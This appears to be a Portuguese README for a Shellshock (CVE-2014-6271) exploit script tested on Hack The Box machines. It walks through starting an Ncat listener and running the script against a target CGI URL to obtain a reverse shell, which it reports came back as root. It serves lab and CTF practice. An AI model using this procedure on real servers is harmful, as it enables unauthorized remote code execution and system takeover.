
Exploração Shellshock, também conhecida como CVE-2014-6271
Exploit Shellshock também conhecido como CVE-2014-6271.
Testado no Bash 3.2 e Bash 4.2.
Para mais informações sobre a vulnerabilidade, visite: https://nvd.nist.gov/vuln/detail/CVE-2014-6271
O exploit foi principalmente testado no Hack The Box nos seguintes boxes:
Beep box : https://app.hackthebox.eu/machines/BeepShocker box : https://app.hackthebox.eu/machines/ShockerCaso contrário, se você tiver um 403 no diretório /cgi-bin/, tente enumerar arquivos
dentro desse diretório com uma boa wordlist, procurando por extensões .sh ou .cgi.
NOTA: Não se esqueça de configurar seu TCP listener, caso contrário o exploit pode te dar
um falso positivo durante a verificação da chamada testRevShell
Primeiramente, podemos ver os argumentos que o exploit aceita executando: shellshock.py -h
Depois podemos configurar um listener Ncat em uma porta de nossa escolha, aqui escolhi a 45
Em seguida, podemos executar o exploit fornecendo todos os argumentos que ele espera, executando:
shellshock.py [OUR_IP] [OUR_LISTENNING_PORT] [TARGET_URL]
A URL alvo aqui, como você pode ver, é onde o servidor web envia uma requisição POST durante a autenticação naquela box
Aqui, como podemos ver na saída, o exploit tentou enviar o payload via SSL usando múltiplas versões TLS, até que teve sucesso
E aqui conseguimos nossa reverse shell! Por sorte, o servidor web estava rodando como root.